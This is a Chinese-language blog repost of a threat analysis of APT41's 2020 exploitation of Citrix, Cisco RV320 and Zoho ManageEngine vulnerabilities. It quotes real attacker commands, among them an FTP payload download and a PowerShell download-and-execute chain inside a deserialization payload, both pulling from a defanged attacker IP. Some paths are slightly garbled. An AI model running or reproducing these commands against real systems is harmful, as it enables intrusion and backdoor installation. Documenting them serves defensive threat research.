如何进行APT41多漏洞网络攻击的分析


本篇文章给大家分享的是有关如何进行APT41多漏洞网络攻击的分析,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。2020年1月20日开始,APT41使用IP地址66.42.98 [.] 220尝试利用漏洞CVE-2019-19781(于2019年12月17日发布)。时间线:最初利用CVE-2019-19781攻击发生在2020年1月20日和2020年1月21日,攻击活动中会执行命令‘file /bin/pwd’。 首先将确认系统是否存在漏洞,有没有部署相关漏洞缓解措施。 其次返回目标体系结构相关信息,为APT41后续部署后门提供信息。所有观察到的请求仅针对Citrix设备执行,APT41利用已知设备列表进行操作。HTTP POST示例:1月23日至2月1日之间APT41活动暂停,从2月1日开始APT41开始使用CVE-2019-19781漏洞,这些载荷通过FTP下载。 APT41执行命令’/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]@66.42.98[.]220/bsd’,连接到66.42.98 [.] 220,使用用户名“ test”和密码登录到FTP服务器,然后下载“ bsd”有效负载(可能是后门)。HTTP POST示例:2月24日和2月25日CVE-2019-19781的利用次数显着增加,仅载荷名发生了变化。2020年2月21日APT41成功攻击了一家电信组织的Cisco RV320路由器,并下载了为名为“ fuc”(MD5:155e98e5ca8d662fad7dc84187340cbc)的64位MIPS有效负载。Metasploit模块结合了两个CVE(CVE-2019-1653和CVE-2019-1652)在Cisco RV320和RV325小型企业路由器上实现远程代码执行,并使用wget下载有效负载。66.42.98 [.] 220还托管了文件http://66.42.98[.] 220/test/1.txt(MD5:c0c467c8e9b2046d7053642cc9bdd57d)的内容为“ cat/etc/flash/etc/nk_sysconfig”,该命令可在Cisco RV320路由器上执行显示当前配置。Cisco Small Business RV320 and RV325 Routers Information Disclosure VulnerabilityCisco Small Business RV320 and RV325 Routers Command Injection Vulnerability3月5日研究人员发布了CVE-2020-10189验证代码。 从3月8日开始APT41使用91.208.184 [.] 78来试图利用Zoho ManageEngine漏洞,有效负载(install.bat和storesyncsvc.dll)有两个不同的变化。 在第一个变体中,使用CVE-2020-10189漏洞直接上传“ logger.zip”,其中包含一组命令可使用PowerShell下载并执行install.bat和storesyncsvc.dll。java/lang/RuntimegetRuntime()Ljava/lang/Runtime;Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile(‘http://66.42.98[.]220:12345/test/install.bat’,’C:
WindowsTempinstall.bat’)&powershell $client = new-object System.Net.WebClient;$client.DownloadFile(‘http://66.42.98[.]220:12345/test/storesyncsvc.dll’,’
C:Windows免费云主机域名Tempstoresyncsvc.dll’)&C:WindowsTempinstall.bat'(Ljava/lang/String;)Ljava/lang/Process;StackMapTableysoserial/Pwner76328858520609Lysoserial/Pwner76328858520609;在第二个版本中APT41利用Microsoft BITSAdmin工具从66.42.98 [.] 220端口12345下载install.bat(MD5:7966c2c546b71e800397a67f942858d0)。两种变体都使用install.bat批处理文件来安装名为storesyncsvc.dll(MD5:5909983db4d9023e4098e56361c96a6f)。install.bat内容:与c2服务通联:在攻击利用几个小时内,APT41使用storecyncsvc.dll BEACON后门下载了具有不同C2地址的辅助后门,然后下载2.exe(MD5:3e856162c36b532925c8226b4ed3481c)。2.exe是VMProtected Meterpreter下载器,用于下载Cobalt Strike BEACON shellcode。该组利用多次入侵来延迟对其其他工具的分析。APT41这次活动中的扫描和攻击体现了其漏洞利用速度越来越快,目标信息搜集范围逐步扩大。此前美国防部确认,APT41成功利用CVE-2019-3396(Atlassian Confluence)攻击美国一所大学。可见APT41在从事间谍活动同时也在进行以经济利益为动机的网络活动。以上就是如何进行APT41多漏洞网络攻击的分析,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注云编程开发博客行业资讯频道

相关推荐: Nginx停止服务的命令是什么

本篇内容介绍了“Nginx停止服务的命令是什么”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!1.停止Nginx服务的四种方法从容停止服务这种方法较stop相比就…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

Like (0)
Donate 微信扫一扫 微信扫一扫
Previous 02/07 14:28
Next 02/07 14:28